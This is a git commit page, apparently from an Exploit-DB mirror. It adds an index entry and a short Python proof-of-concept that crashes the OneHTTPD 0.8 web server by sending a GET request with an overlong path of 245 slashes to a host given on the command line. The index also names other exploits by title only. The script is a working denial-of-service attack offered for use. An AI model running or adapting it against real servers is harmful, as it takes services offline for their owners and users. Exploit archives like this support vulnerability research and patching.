Updated 02_10_2014
This commit is contained in:
parent
06a84a9568
commit
97ddd98874
2 changed files with 19 additions and 0 deletions
|
@ -28323,3 +28323,4 @@ id,file,description,date,author,platform,type,port
|
|||
31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface Code Execution",2014-02-07,metasploit,hardware,remote,0
|
||||
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
|
||||
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
|
||||
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
|
||||
|
|
Can't render this file because it is too large.
|
18
platforms/windows/dos/31522.py
Executable file
18
platforms/windows/dos/31522.py
Executable file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: onehttpd 0.8 Crash PoC
|
||||
# Date: Feb 7,2014
|
||||
# Exploit Author: Mahmod Mahajna (Mahy)
|
||||
# Version: 0.8
|
||||
# Software Link: https://onehttpd.googlecode.com/files/onehttpd-0.8.exe
|
||||
# Tested on: Windows XP SP3
|
||||
# Email: m.dofo123@gmail.com
|
||||
from requests import get,ConnectionError as cerror
|
||||
from sys import argv
|
||||
if(len(argv)!=2):
|
||||
print '%s host' % argv[0]
|
||||
else:
|
||||
buff = '/'*245
|
||||
script,host=argv
|
||||
try:
|
||||
get('http://'+host+':8080/'+buff)
|
||||
except cerror:
|
||||
exit(1)
|
Loading…
Add table
Reference in a new issue